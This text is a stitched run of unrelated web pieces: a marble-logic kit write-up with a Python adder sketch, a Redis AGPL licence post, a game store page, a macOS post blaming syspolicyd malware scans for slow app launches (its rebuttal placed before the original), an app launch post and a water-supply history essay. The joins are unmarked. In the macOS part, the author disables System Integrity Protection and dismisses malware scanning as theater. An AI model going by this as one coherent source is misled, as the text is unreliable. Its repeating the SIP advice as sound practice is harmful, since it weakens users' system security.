Here’s a binary adder made of a long turn, canute, and distributor — which together are not much bigger than a postage stamp. (Wave your hands and amortise away the space occupied by the disk drive itself, I/O plumbing etc etc)
Because space is at such a premium, instead of staggering multiple XORs and ANDs, we just bundle it all into a single unit — it’s small but slow.
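Functionally, that bundled unit behaves like a bit-serial adder working along the marble bitstream, least significant bit first. A quick Python sketch of the idea (purely illustrative, not how the roons themselves are specified):

```python
# Bit-serial addition over two bitstreams, LSB first — the job the
# long turn + canute + distributor bundle performs mechanically.
from typing import Iterable, Iterator

def serial_add(a: Iterable[int], b: Iterable[int]) -> Iterator[int]:
    carry = 0
    for x, y in zip(a, b):
        yield x ^ y ^ carry                     # sum bit for this step
        carry = (x & y) | (carry & (x ^ y))     # carry into the next step
    if carry:
        yield carry

# 5 (101) + 3 (011), LSB first: expect 8, i.e. [0, 0, 0, 1]
print(list(serial_add([1, 0, 1], [1, 1, 0])))   # [0, 0, 0, 1]
```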
We can also do memory, latches, processors, counters, timers, etc. Follow the tutorial sequence to learn more.
modularity
I wanted it to be easy to store and run lots of different patterns. Each disk drive is reasonably pocket-sized, but there’s still a lot of space dedicated to the internal gear mechanism.
So here’s the removable disk system:
This is pretty simple, but it took a long time to get right! Challenges included:
Figuring out exactly how much of the mechanism I could shunt down into the disk drive, and how much I had to retain in the disk
Optimising magnet strengths and positions — need the save/load to work smoothly, while preventing the base from popping back up in operation
We can also move individual bars between disks, or rearrange the order within a disk. This makes it easy to adjust a pattern if we started it in the wrong place.
extendability
If we need a bigger workspace, we just put drives next to each other. This works along both X and Y axes, so you can build 2D grids.
binding
Each face of the drive has a pair of north-south magnets at its ends. This lets it pair up with a 180-degree-rotated copy of itself.
The centre of each face also has a small raised nub next to a corresponding pocket. This locks the drive into a precise position.
power
We also need to transfer power through the system. Originally I used horizontal axles with hidden magnetic couplers, which looked very cool but had too many design issues.
Instead, each drive has a 2 x 2 gear grid, where each gear has an integrated barrel cam to move the bars up and down. When two drives are placed next to each other, the gears bind together.
Because N is even in our N x N gear grid, the drives all spin the same way. This matters because certain peripherals expect a particular direction of rotation.
phase
We want all the bars to move in phase. Connecting the drives up correctly is fiddly — it’s easy to accidentally offset the connection by a tooth or two.
To prevent this, the gears have a layer of phase baffles (I don’t know the technical term). These physically block the gears from connecting until they’re perfectly synced up.
Combining all these principles together gives us a lot of freedom in how we set up our workspace:
double grid
large mode
s n e k
How practical are these big grids, though? More details in the hardware deep dive.
storage
I wanted to make roons easy to store. I already had the stud system for binding tiles to bars, so I just extended that. The bases of the drives accept studs, so you can stack them up.
I also looked for convenient places to store the smaller pieces. For example, the encabulator has a hollow core for marbles, and roons can be stored upside-down in the travel lid.
peripherals?
What an odd question, but — yes! Yes, roons has peripherals. These use the same 2×2 gear interface as the disk drives, so they plug into the grid and sync up.
There are two boring feature-complete peripherals:
The encabulator lets the user supply rotation to the system, powering each device.
The bucket is a bucket. Marbles can fall into it. This one was particularly challenging and took billions of research hours.
The WIP peripherals are where things get spicy:
The 7-segment display (WIP) intakes 4-bit numbers on a cycle, converting them into the corresponding base ten digit (plus 6 special characters)
mockup 7-segment display for illustration — prototype coming soon
The numpad (WIP) converts keypresses of the digits 0-9 into 4-bit marble bitstreams.
The alphanumeric display (WIP) is a 6-bit extension of the 7-segment display, capable of displaying all letters of the alphabet, digits, and your favourite punctuation marks.
The hard drive (WIP) is space-efficient marble data storage that can be used as input/output for other patterns.
The turbo encabulator (NES, Not Even Started) is a motorised encabulator for powering larger grids.
Expect some big updates soon — these peripherals are what makes roons look like actual magic. For example, plugging a display into an adder:
Or chaining multiple displays together to get scrolling text (the bitstream passes through):
But I am just one person, and physically implementing these designs takes me a long time. So no mechanical text displays for you — yet.
materials and manufacturing
Most components are prototyped in 3D-printed PLA. Plans are to switch to injection-moulded ABS for mass production, though I’ve got a couple of more complex plans up my sleeve depending on demand.
I print these using three Bambu Labs A1 Minis. These are really really good, by the way.
Many of these pieces would be better prototyped in something like resin, but FDM turned out to be good enough; it’s what I was familiar with and had access to.
magnets
Each roon needs to cling to the bars of the loom. Consequently, I have manually superglued approximately 6,000 tiny neodymium magnets, and no longer have fingerprints.
bars
The bars of the disk need to be magnetic (or at least magnetically receptive). But inserting individual magnets would be too expensive and tedious.
Therefore, I manually trim down Copper-Coated Mild Steel (CCMS) brazing rods with a pair of bolt cutters, then embed them in the bars. You wouldn’t believe how many failed approaches it took to find this solution — could be an entire post in itself.
website
I took a calculated risk in setting up the whomtech website, and used two unproven technologies:
WordPress
is a little-known website builder. We hope that the endorsement of an industry titan like whomtech can give this underused piece of tech some exposure.
JavaScript
is a fresh, new approach to minimising your serotonin. It combines the elegance of Java with the type safety of punching yourself in the throat.
You can read more JS slander in the software deep dive.
disappointments
So is roons an unmitigated success?
No! Don’t worry, there are many mitigations:
Peripherals behind schedule — The really cool peripheral prototypes are nowhere near production ready. The challenge is to integrate them with the marble bitstream concept, while minimising the number of parts and maximising reliability. I’d hoped to have this done by now — it’s absolutely possible, but I am slow.
Piece reliability — Newer roons like the crossing haven’t hit the level of reliability I want. “Mostly working” isn’t good enough — we need 99.9%+ reliability to build anything interesting. This isn’t a threat to the underlying Turing completeness, but it does reduce the kit’s convenience.
Piece interoperability — This is the real curse. Getting each roon to interoperate reliably with every other roon is exponentially (quadratically?) difficult. I’m happy with the basic interactions, but there are esoteric cases where an interaction “should” work but doesn’t.
Ease of use — roons can be small and fiddly. I’m used to them by now, but there’s still work to be done to make it easier for newcomers.
Simulator — I design the tutorials using a janky simulator tool I built. I wanted to polish it up before general release, but here we are.
Site and tutorials — There’s still tons of tutorial content to write, and parts of the site that need attention.
Additional roons — There are many, many specific roons that I haven’t had time to develop yet: e.g. enhanced lateral movement, more state, general conveniences, 3D movement, etc
more technical stuff
A ton of research and experimentation went into this project over the last couple of years. Some of it’s pretty interesting! You can read the mind-numbing details here:
Five months ago, I rejoined Redis and quickly started to talk with my colleagues about a possible switch to the AGPL license, only to discover that there was already an ongoing discussion, a very old one, too. Many people, within the company, had the feeling that the AGPL was a better pick than SSPL, and while eventually Redis switched to the SSPL license, the internal discussion continued.
I tried to give more strength to the ongoing pro-AGPL license side. My feeling was that the SSPL, in practical terms, failed to be accepted by the community. The OSI wouldn’t accept it, nor would the software community regard the SSPL as an open license. In little time, I saw the hypothesis getting more and more traction, at all levels within the company hierarchy.
I’ll be honest: I truly wanted the code I wrote for the new Vector Sets data type to be released under an open source license. Writing open source software is too rooted in me: I rarely wrote anything else in my career. I’m too old to start now. This may be childish, but I wrote Vector Sets with a huge amount of enthusiasm exactly because I knew Redis (and my new work) was going to be open source again.
I understand that the core of our work is to improve Redis, to continue building a good system, useful, simple, able to change with the requirements of the software stack. Yet, returning back to an open source license is the basis for such efforts to be coherent with the Redis project, to be accepted by the user base, and to contribute to a human collective effort that is larger than any single company. So, honestly, while I can’t take credit for the license switch, I hope I contributed a little bit to it, because today I’m happy. I’m happy that Redis is open source software again, under the terms of the AGPLv3 license.
Now, time to go back to the terminal, to show Redis users some respect by writing the best code I’m able to write, and make Vector Sets more useful and practical: I have a few more ideas for improvements, and I hope that more will be stimulated by your feedback (it is already happening). Good hacking!
P.S. Redis 8, the first version of Redis with the new license, is also GA today, with many new features and speed improvements to the core: https://redis.io/blog/redis-8-ga/
You can also find the Redis CEO blog post here: https://redis.io/blog/agplv3/
After years of trying, you finally manage to dial into other-space. You find that the dweller of other-space has challenging questions about computability and is asking for your help.
75+ levels
Solve puzzles in constrained spaces using a handful of instructions
Solve open-ended problems and design your own solutions
Optimize your solutions for speed, instructions or space
Use multithreading - carefully time and synchronize your execution threads to halve the execution time
Set breakpoints - step backward, or even step forward!
Compare with other players - see how your solutions rank with fun histograms
Create your own levels, share them and solve community made levels
Trailer music: "Home Dimension" by Joey Freeze / CC BY 3.0
System Requirements
Minimum:
Requires a 64-bit processor and operating system
OS: 11
Processor: 2.0 GHz
Memory: 4 GB RAM
Storage: 500 MB available space
Recommended:
Requires a 64-bit processor and operating system
OS: 11
Processor: 2.0 GHz
Memory: 4 GB RAM
Storage: 500 MB available space
I discovered that the slow launches are caused by the syspolicyd process, specifically DispatchQueue "com.apple.security.syspolicy.yara". The backtrace showed syspolicyd calling the yr_rules_scan_file function.
Malware scan using any known Yara rules is most unlikely, as:
XProtect Yara rules commonly include file size limits, resulting in few rules applying to larger files, and more rapid completion.
Known checks using Yara rules are all well-recorded in log entries, and the source of those rules is stated clearly.
Yara scans are normally reported with their result.
Scan results are succinct and hardly likely to be lost in a ‘cache miss’.
I'm truly baffled by this denial, because the backtrace I mentioned comes directly from spindumps (/usr/sbin/spindump), which sample every running process on the system at frequent intervals (every 10 milliseconds by default). Spindumps don't lie!
The spindumps also indicate that the syspolicyd malware checks are triggered by the dlopen function to load a dynamic library. These are the framework checks that Oakley mentions; a framework is essentially a bundled dynamic library. You can see the series of function calls in the samples of the launching app:
AppleSystemPolicy::waitForEvaluation(syspolicyd_evaluation*, int, ASPEvaluationInfo*, vnode**, evaluation_results*, long long*, char const*)
It doesn't get any more obvious than perform_malware_scan_if_necessary! And the app is literally waiting for the syspolicyd evaluation, hence the slow launch.
I tried to explain this to Oakley in the comments of one of his blog posts, but for some strange reason, he refuses to accept my points. In fact, he refuses to take or to read a spindump. At first he claimed it was too difficult for anyone except an "expert" like me, but I simply selected "Spindump" from the action menu in Activity Monitor and then did a text search of the resulting file. (On the other hand, you can control the timing of the spindump more precisely using the spindump command-line tool, even specifying that it should wait for a particular app to launch.)
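For instance, a minimal invocation from Terminal might look like the following; the process name and duration are illustrative, and man spindump documents the full set of options, including the one for waiting on an app launch:
# Sample the FileMerge process for 10 seconds at the default
# 10 ms interval (spindump requires root privileges):
sudo spindump FileMerge 10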
Oakley's position appears to be that the log messages tell him everything that he needs to know, as if a phenomenon doesn't exist unless it's logged. As a computer programmer himself, Oakley ought to know better, because a log message occurs only if the programmer specifically, intentionally writes a logging statement in the program. Not everything that happens on your Mac is magically logged.
Here's Oakley's own theory about the slow launches:
The most likely activity to account for these long checking times is computation of SHA-256 hashes for the contents of each item in the app’s Frameworks folder. Thus, these occasional extremely long launch times are most probably due to time taken ‘evaluating trust’ by computing hashes for protected code in the Frameworks folder in the app bundle, when those hashes have been flushed from their cache.
Oakley seems to be claiming, with no empirical evidence, that Macs have a cache of SHA-256 hashes of all bundled files of all apps that have been launched. But where exactly is this cache??? I've never seen it or heard of such a thing. As far as I can tell, it's pure speculation by Oakley based on nothing but a terse log message:
com.apple.syspolicy.exec Recording cache miss for <private>
Ironically, the references to com.apple.syspolicy.exec and AppleSystemPolicy in his log messages appear to match quite well with the results of my spindumps. I don't deny that something is cached, but I think the evidence suggests that what is cached is the result of a malware scan, which for practical purposes would make a lot more sense than a bunch of hashes. After all, malware definitions are periodically updated for newly discovered malware, which means that the results of previous malware scans would eventually become outdated. Oakley's theory, by contrast, doesn't make much sense to me. The code signature of executables is always checked when the executable is loaded at runtime, so if the app has been modified since the previous launch, that would be detected anyway. Moreover, apps have some protections against modification: App Store apps are owned by the root user, and the App Management feature prevents (or is supposed to prevent) notarized apps from unauthorized modification. Thus, I don't even understand the utility of caching SHA-256 hashes of bundled files and periodically recalculating them.
It's also worth noting that Oakley's discussion of hashing performance ignores a key detail: the apps that he examines are universal binaries, with both Intel and ARM architectures. This doubles the size of the bundled dynamic libraries. Oakley runs some hashing tests based purely on the sizes of files, but as Apple explains in a tech note linked to by Oakley's article, each architecture has its own separate code signature:
The command above includes the --arch x86_64 option to show the Intel code signature. Without that codesign shows the code signature for the architecture on which you run the command. So, if you’re on Apple silicon, you’ll see the Apple silicon code signature.
When an app is launched, it's unlikely that the system would inefficiently spend time checking the code signature of an unused architecture, so whatever checks are performed should be measured against only half of the size of each executable.
Overall, as far as I can tell, there's nothing new here, and Oakley is simply observing the same phenomenon that I already observed last year.
I've always attributed slow Xcode launches to Xcode simply sucking, but I've noticed that the FileMerge app frequently launches slowly too. When this happens, the app can take a dozen bounces in the Dock before finally opening. FileMerge resides in the folder Xcode.app/Contents/Applications/ within the Xcode bundle and can be opened from the Xcode main menu under the Open Developer Tool submenu. I actually keep FileMerge in my Dock for quick access, because I use FileMerge a lot for diffing files and folders. I finally got fed up with slow launches and decided to investigate by taking a spindump from Activity Monitor. Spindumps are a nice way to see what exactly is consuming resources on your Mac, because they show the "CPU Time" used by each process on your system and each thread in the process.
From the spindump I discovered that the slow launches are caused by the syspolicyd process, specifically DispatchQueue "com.apple.security.syspolicy.yara". The backtrace showed syspolicyd calling the yr_rules_scan_file function. According to Wikipedia:
YARA is the name of a tool primarily used in malware research and detection. It provides a rule-based approach to create descriptions of malware families based on regular expression, textual or binary patterns.
Thus, macOS is periodically scanning FileMerge for malware on launch, which causes very slow app launches. I don't know what the exact period is between scans, but rebooting the Mac seems to reset the cache, which made it convenient for me to test the malware scans while writing this blog post (but otherwise makes it extremely inconvenient for me). I've noticed the same syspolicyd malware scanning and consequent slow launches with some other apps such as Xcode itself, Google Chrome, and Wireshark. You can even see syspolicyd's % CPU spike in Activity Monitor when the malware scan happens. (In order to catch this, make sure to increase the Update Frequency to 1 sec.)
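If you prefer the command line, a rough Terminal equivalent (assuming a single syspolicyd instance) is:
# Watch syspolicyd's CPU usage live; press q to quit.
top -pid $(pgrep -x syspolicyd)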
Xcode, Chrome, and Wireshark are very large apps, so it makes sense that a malware scan of them would be slow. However, FileMerge is much smaller, only 2 MB. Why does that take so long? My theory is that syspolicyd also scans the launched app's linked libraries. The command otool -L in Terminal will show them:
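For example, assuming a standard Xcode install in /Applications:
# List the dynamic libraries that the FileMerge executable links against.
otool -L /Applications/Xcode.app/Contents/Applications/FileMerge.app/Contents/MacOS/FileMerge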
I doubt that the built-in system libraries are scanned for malware, because they reside on a separate cryptographically-signed read-only disk volume. But FileMerge also links to non-system libraries:
@rpath/IDEFoundation.framework/Versions/A/IDEFoundation (compatibility version 1.0.0, current version 22551.0.0)
@rpath/DVTKit.framework/Versions/A/DVTKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTFoundation.framework/Versions/A/DVTFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DeltaFoundation.framework/Versions/A/DeltaFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DeltaKit.framework/Versions/A/DeltaKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTUserInterfaceKit.framework/Versions/A/DVTUserInterfaceKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/libXCTestSwiftSupport.dylib (compatibility version 1.0.0, current version 22516.0.0, weak)
These libraries are located within the Xcode bundle in the Xcode.app/Contents/SharedFrameworks/ folder.
In my testing, another app bundled with Xcode, Accessibility Inspector, also launched somewhat slowly. This app is larger than FileMerge, yet it launches much more quickly than FileMerge does. I suspect the reason is that it links to fewer Xcode frameworks:
@rpath/AccessibilitySupport.framework/Versions/B/AccessibilitySupport (compatibility version 0.0.0, current version 0.0.0)
@rpath/DVTFoundation.framework/Versions/A/DVTFoundation (compatibility version 1.0.0, current version 1.0.0)
@rpath/DVTKit.framework/Versions/A/DVTKit (compatibility version 1.0.0, current version 1.0.0)
@rpath/AccessibilityAudit.framework/Versions/B/AccessibilityAudit (compatibility version 1.0.0, current version 1.0.0)
@rpath/AccessibilityAuditDeviceManager.framework/Versions/A/AccessibilityAuditDeviceManager (compatibility version 1.0.0, current version 1.0.0)
In case you're wondering, Apple hasn't exempted Mac App Store apps from malware scanning, not even its own apps. I downloaded Xcode from the Apple Developer website rather than from the Mac App Store, but I can see the syspolicyd malware scan when launching large Mac App Store apps such as Pages and Numbers. Again, though, I think that the built-in read-only system apps are exempt.
Here's a mystery: I see frequent slow launches and malware scans with Google Chrome but never with Google Chrome Beta, despite the fact that the Google Chrome Beta app is about the same size as the Google Chrome app. I don't yet have an explanation for the difference in behavior.
By the way, the existence or nonexistence of extended attributes such as com.apple.quarantine makes no difference. Removing all the extended attributes from an app bundle doesn't stop the malware scans.
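The test here amounts to something like the following, with a hypothetical app path:
# Recursively (-r) clear (-c) all extended attributes, including
# com.apple.quarantine, from the whole app bundle, then relaunch it.
xattr -cr /Applications/SomeApp.app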
You may remember our friend syspolicyd as the process that phones home to Apple when running unsigned executables. It was also the culprit in making Xcode tools slow after reboot. I guess I should have already known the cause of the slow app launches, but I must have forgotten and/or failed to put two and two together. In any case, syspolicyd sucks, and I really wish there were a way to completely disable the malware scanning and allow my apps to always launch quickly. I'm very careful about what I install, and I've never had malware in over twenty years of full-time Mac usage, so I think it's safe to say that for me, syspolicyd is security theater, and I'd rather not have to sit through its "play", full of sound and fury, signifying nothing. To be fair, I don't have an issue with malware scanning in the background; I just don't want malware scanning to hold up my apps launching in the foreground. Instead of interrupting me and scanning an app during the seconds when I'm launching it—what should be a fraction of a second—how about scanning the app during the innumerable seconds when I'm not launching it?
Perhaps disabling System Integrity Protection disables the malware scan too? I haven't checked this, but it's not really viable for me as a Mac software developer, because I need to test in the same runtime environment as my users; otherwise I could write code that works for me but not for them. I believe that disabling SIP also disables some Apple services on your Mac that are "protected" by DRM (in order to make reverse engineering more difficult).
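For reference, SIP is toggled from Terminal in the macOS Recovery environment, not from a normal boot; a sketch:
# From Terminal in macOS Recovery, then reboot:
csrutil disable
# From a normal boot, verify the current state:
csrutil status
# To undo, boot back into Recovery and run:
csrutil enable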
Addendum
I've now confirmed that disabling SIP does indeed eliminate the syspolicyd malware scan. Xcode launches so fast, it's beautiful. I feel like I'm in heaven! I don't think I can go back to the previous hell. I'll live with the consequences, whatever they may be.
On iOS, we're spoiled for choice when it comes to note-taking, journaling, or social media apps. In note-taking alone, I've flip-flopped between different note-taking and journaling apps. For one reason or another, none would stick. My initial attempt at building such an app faded just the same. That is, until I realized what I really wanted was a cocktail of sorts, combining user experiences from all three kinds. Only then did I finally gain some traction, and Journelly was truly born.
I'm happy to share that, as of today, Journelly is generally available on the App Store. Check out journelly.com for all app details or just read on...
Like tweeting, but for your eyes only
While bringing social to note-taking was categorically never a goal, there's a thing or two we can draw from social media apps. They make it remarkably easy to browse and just share stuff.
All my previous mobile note-taking attempts failed to stick, almost exclusively because of friction. By bringing a social-media-like feed to my notes and making it remarkably easy to just add and search for things, app stickiness quickly took off.
Of course, these being my personal notes, privacy is non-negotiable. With Journelly being offline by default, combining elements from note-taking, journaling, and social media apps, I came to think of Journelly's experience as "tweeting but for your eyes only".
Is it a notes app? Journaling app? It's whatever you want it to be…
I like how journaling apps automatically bundle timestamps with your entries and maybe additional information like location or even weather details. At the same time, splitting my writing between two apps (quick notes vs. journaling) always felt like unnecessary friction. Even having to decide which app to launch felt like a deterrent.
While my typical Journelly use-case hops between taking notes, journaling, today's grocery shopping list, saving a few links from the web, music, movies—the list goes on… jcs from Irreal puts it best: "Journelly is a bit of a shape shifter." With just enough structure (but not too much), Journelly can serve all sorts of use-cases.
No lock-in (powered by org plain text)
While I want a smooth mobile note-taking experience, I also don't want my notes to live in a data island of sorts. I'm a fan of plain text. I've been writing my notes and blog posts at xenodium.com using Org plain text for well over a decade now, so my solution naturally had to have some plain text thrown at it.
Journelly stores entries using Org markup for now, but Markdown is coming too. Interested in Markdown support? Please reach out. The more requests I receive, the sooner I'll get it out the door. Oh, and since we're talking Markdown, I also launched lmno.lol, a Markdown-powered blogging service (minus the yucky bits of the modern web). Custom domains are welcome too. My xenodium.com blog runs off lmno.lol.
Having said all of that, markup is just the cherry on the implementation cake. You need not know anything about markups to use Journelly. Just open the app and start writing.
iCloud syncing (optional)
While Journelly is offline by default, you may optionally sync with other devices via iCloud.
Folks have reported using Working Copy, Sushitrain, or Möbius Sync for syncing, though your mileage may vary. As of v1, I can only offer iCloud as the officially supported provider.
There's little structure enforced on Journelly entries. Write whatever you want. If you want some categorization, sprinkle entries with your favorite hashtags. They're automatically actionable on tap, enabling quick searches in the future.
Thank you beta testers!
Nearly 300 folks signed up to Journelly's TestFlight. Thank you for testing, reporting issues, and all the great suggestions. While many of your feature requests made it to the launch, I've had to defer quite a few to enable the v1 release. The good news is I now have a healthy backlog I can work on to bring features over time.
Support indie development
The App Store is a crowded place. Building ✨sustainable✨ iOS apps is quite the challenge, especially when doing right by the user. Journelly steers clear of ads, tracking, distractions, bloat, lock-in, and overreaching permissions. It embraces open formats like Org markup, safeguarding the longevity of your data.
Johnny Appleseed used to be a staple character in old American children’s books. A ragged vagabond in the early nineteenth century, Appleseed traveled barefoot through the forest, wore coffee sacks with cut-out holes for his arms and head, and planted thousands upon thousands of apple trees for the first settlers in Pennsylvania, Ohio, Illinois, and Indiana.
“Appleseed” was a nickname; he was born as John Chapman. As a young man, Chapman became convinced that Christianity had lost its way and needed to be restored by a new church. He worked in an orchard, fell in love with apples, and devoted the rest of his long life to wandering through the newly occupied Middle West, passing out tracts for the new church — and establishing apple orchards, selling the saplings for a few pennies each.
Although a dozen or so Johnny Appleseed festivals are still celebrated, he is less likely to be found in children’s books today. That may be because historians realized that Appleseed was not just a kindly religious eccentric who went around planting apples so that Midwesterners could have fresh, healthy fruit. Instead, he was a vital part of village infrastructure: his apples were mostly not for eating, they were for making hard cider.
Typical hard cider has an alcohol level of about five percent, enough to kill most bacteria and viruses. Many settlers drank it whenever possible, because the water around them was polluted — sometimes by their own excrement, more commonly by excrement from their farm animals. Cider from Appleseed’s apples let people avoid smelly, foul-tasting water. It was a public health measure — one that, to be sure, let some of its users pass the day in a mild alcoholic haze.
For as long as our species has lived in settled communities, we have struggled to provide ourselves with water. If modern agriculture, the subject of the previous article in this series, is a story of innovation and progress, the water supply has all too often been the opposite: a tale of stagnation and apathy. Even today, about two billion people, most of them in poor, rural areas, do not have a reliable supply of clean water — potable water, in the jargon of water engineers. Bad water leads to the death every year of about a million people. In terms of its immediate impact on human lives, water is the world’s biggest environmental problem and its worst public health problem — as it has been for centuries.
On top of that, fresh water is surprisingly scarce. A globe shows blue water covering our world. But that picture is misleading: 97.5 percent of the Earth’s water is salt water — corrosive, even toxic. The remaining 2.5 percent is fresh, but the great bulk of that is unreachable, either because it is locked into the polar ice caps, or because it is diffused in porous rock deep beneath the surface. If we could somehow collect the total world supply of rivers, lakes, and other fresh surface water in a single place — all the water that is easily available for the eight billion men, women, and children on Earth — it would form a sphere just 35 miles in diameter. Adding in reachable groundwater would add some miles to that sphere, but not enough to dramatically alter the fact that our water-covered globe just doesn’t have that much fresh water we can readily get our hands on.
Couldn’t we make more? It is true that salt water can be converted into fresh water. Desalination, as the technique is called, most commonly involves forcing water through extremely fine membranes that block salt molecules but let water molecules, which are smaller, pass through. The Western hemisphere’s biggest desalination plant, in Carlsbad, California, is a technological marvel, pumping out about 50 million gallons of fresh water every day, about 10 percent of the water supply for nearby San Diego. But it also cost about $1 billion to build, uses as much energy as a small town, and dumps 50 million gallons per day of leftover brine, which has attracted numerous lawsuits. For now, in most places, supplying fresh water will have to be done the way it has always been done: digging a well or finding a river, lake, or spring, then pumping or channeling the water where needed.
The Problem
No matter what its source, almost every way that humans use water makes it unfit for later use. Whether passed through an apartment dishwasher or a factory cooling system, a city toilet or a rural irrigation system, the result is an undrinkable, sometimes hazardous fluid that must be cleaned and recycled. When water engineers say, “We need clean water,” clean is the part they worry about.
Clean water is a necessity for more than just drinking. Almost three-quarters of human water use today is for agriculture, especially irrigation (out of all the world’s food, about 40 percent is grown on irrigated land). Another fifth of water use is by industry, where water is both a vital raw ingredient and a cleaning and cooling agent. Households are responsible for just one-tenth of global water consumption, but most of that is used for cleaning: washing dishes, washing clothes, washing people, washing away excrement.
Providing the clean water needed for all these purposes entails four basic functions:
Finding, obtaining, and purifying the water that goes into the system;
Delivering it to households and businesses;
Cleaning up the water that leaves those homes and businesses; and
Maintaining the network of pipes, pumps, and other structures responsible for the previous three functions.
Simple to describe, these tasks are hair-pullingly complex on the ground. The challenge of building and operating a water system that can supply the daily onslaught of morning flushes and showers while not flooding people who turn on their taps at low-use times is the sort of thing that keeps engineers awake at night. Even simple water-supply pipes are more complex than one might think. Water is heavy and not very compressible. When it travels through a pipe, it can acquire a lot of momentum. When multiple water users close valves or stop pumps, the momentum can create a shockwave in the pipe. In big pipelines, this “water hammer” is like a freight train smashing into a wall — it can damage the pipeline or tear apart equipment. Special slow-closing valves and pumps are required.
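For a sense of scale, engineers estimate the surge with the Joukowsky relation; the figures here are illustrative, not from the article. Suddenly stopping water moving at a brisk 2 meters per second in a rigid pipe, where the pressure wave travels at roughly 1,200 meters per second, produces
$\Delta p = \rho \, c \, \Delta v \approx 1000\,\mathrm{kg/m^3} \times 1200\,\mathrm{m/s} \times 2\,\mathrm{m/s} = 2.4\,\mathrm{MPa},$
about 24 atmospheres of sudden excess pressure, which is why those slow-closing valves matter.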
Difficult as these technical issues are, they have been largely understood since biblical times and before. By far the biggest and most frustrating obstacle is instead what social scientists call “governmentality” — and what everybody else calls corruption, inefficiency, incompetence, and indifference.
The evidence is global and overwhelming. English cities lose a fifth of their water supply to leaks; Pennsylvania’s cities lose almost a quarter; cities in Brazil lose more than a third. So much of India’s urban water is contaminated that the cost of dealing with the resultant diarrhea is fully 2 percent of the nation’s gross domestic product. Texas loses so much water that just fixing the leaks could provide enough water for all of its major cities’ needs in the near future. All fifty states and all U.S. territories are plagued by water systems with lead pipes, which can leach dangerous lead into their water. The Mountain Aquifer between Israel and Palestine is the primary source of groundwater for both. In an atypical act of collaboration, both are overusing and polluting it. And so on.
Ancient Solutions
Water systems and their problems are as old as the first cities, and possibly older. The urban complex of Mohenjo-Daro, on the banks of Pakistan’s Indus River, arose about 2600 B.C., around the time that Egyptians were erecting the pyramids. Mohenjo-Daro was the biggest city in what archaeologists call the Harappan or Indus Valley civilization. Most of the citizenry lived in the “lower town,” a Manhattan-like grid of streets and boulevards faced by low brick buildings. Atop a high platform of mud bricks to its west was the “upper town,” sometimes romantically called the Citadel, a civic center that held relatively few people. Remarkably, there is little evidence that people in the upper town were richer or more powerful than those in the lower — Mohenjo-Daro seems to have been a surprisingly egalitarian place.
Water control was at its heart. Some 700 public wells dotted the lower city, many of them sixty feet deep. Cylindrical and lined with bricks and plaster, these wells created an urban water supply with a capacity and safety level that would not be matched until the modern era. Its source was snowfall and rainfall in the foothills of the Himalayas that had percolated into the soil, becoming groundwater; during its journey from the heights to the ground beneath Mohenjo-Daro, the water passed through layers of rock and sand that filtered out contaminants.
Mohenjo-Daro had an equally impressive system for flushing dirty water out of the city. Beneath both upper and lower cities was an intricate arrangement of drains, most of them narrow trenches in the streets, usually about two feet deep and covered by bricks that could be removed for service. Many drain lines had “settling pools” — basin-like areas in which the water would slow down enough to deposit some of the sediment it carried. In a rudimentary form of sewage treatment, the pools would be emptied out and the deposited sediment probably used for fertilizer.
In the upper town was the Great Bath, a forty-foot-long, eight-foot-deep sunken pool in the middle of a plaza that archaeologists have called humankind’s first artificial swimming pool. In the lower town, almost every house had a similar, smaller replica — a square, shallow basin, perhaps three feet on a side, against an outside wall. The basin sloped toward a floor-level outlet in the wall that drained into an outside “catchment vessel,” a kind of ceramic tub, which in turn led to a public drain (or, in some cases, could be dumped into one). By the bathing area was a toilet — a seat with a hole — that also deposited into the catchment vessel. Partly because linguists have not yet deciphered the Indus Valley script, details of daily existence in Mohenjo-Daro remain unknown. But bathing in clean water was clearly a focus of the city’s social life.
The Great Bath, possibly humanity’s first artificial swimming pool, in Mohenjo-Daro, Pakistan
Mike Goldwater / Alamy
The reason to describe this long-ago city in such detail is that the technology deployed in the Indus Valley would not be surpassed, or even much changed, until just a few centuries ago. Imperial Rome, at its height likely the world’s biggest, most sophisticated city, had a water system that would have been familiar to people from Mohenjo-Daro, more than two thousand years before. Like its predecessors, Rome took advantage of gravity to make water flow from springs and rivers in the high hills outside the city into public facilities on the streets below. Perhaps the biggest difference was that the water from the hills came into the city on a series of aqueducts — bridge-like constructions that channeled water across valleys.
Rome, like Mohenjo-Daro, had a web of sewers that channeled away stormwater and wastewater. In Rome, that effluent flowed into a giant pipe called the Cloaca Maxima, which conducted the water into the Tiber River. Traveling downriver, the solid particles in the waste would drop to the riverbed; whatever remained would be diluted by flowing into the sea. The Roman model was replicated around the world for centuries. Louis XIV’s Paris dumped its waste into the Seine River; James Madison’s Washington, D.C., into the Potomac; Queen Victoria’s London into the Thames.
Despite having been employed for thousands of years, this method had an obvious drawback: it polluted the river, creating a terrible stench and making people sick downstream. Actually trying to clean up sewage, as opposed to sluicing it elsewhere, was rarely considered. Sometimes governments used wastewater for irrigation, a practice that, again, goes at least as far back as Mohenjo-Daro. In East Asia, excrement-filled water was often dispatched to “sewage farms,” which used the water as fertilizer. In 1531 the first European sewage farm opened in Bolesławiec, in what is now western Poland. The idea was slow to spread; France and Germany did not begin operating them until the nineteenth century.
Great Stink
The Industrial Revolution led to a dramatic increase in water use in urban factories. The resulting waste led to an equally dramatic decrease in water quality that fostered disease, especially cholera. Cholera is caused by drinking water contaminated with the bacterium Vibrio cholerae; sufferers have diarrhea so violent that it can kill them within hours if untreated. London, capital of what was then the world’s biggest, richest, most technologically advanced empire, experienced cholera epidemics in 1832–33, 1848–49, and 1853–54. Each time, thousands died.
During the 1854 epidemic a physician named John Snow traced the outbreak to a single contaminated city well. Politicians thundered against filth and disease but did next to nothing. They didn’t even keep the well closed. Four years later, hot weather reduced the flow of the Thames, which caused raw sewage and industrial waste to pile up on the banks. So overwhelming was the Great Stink of 1858 that Parliament was forced to act. Clamping scented handkerchiefs over their faces to stifle the smell, legislators finally voted to extend, enclose, and revamp the city sewer system.
Aiding London’s municipal engineers in the city’s belated upgrade was the first major innovation in water treatment for thousands of years: the pump. Although pumps are known from as far back as ancient Greece, they were not deployed on a large scale until about 1700, the beginning of the industrial era. Big pumps powered by coal-burning engines allowed London and many other cities to channel huge quantities of wastewater away from the city.
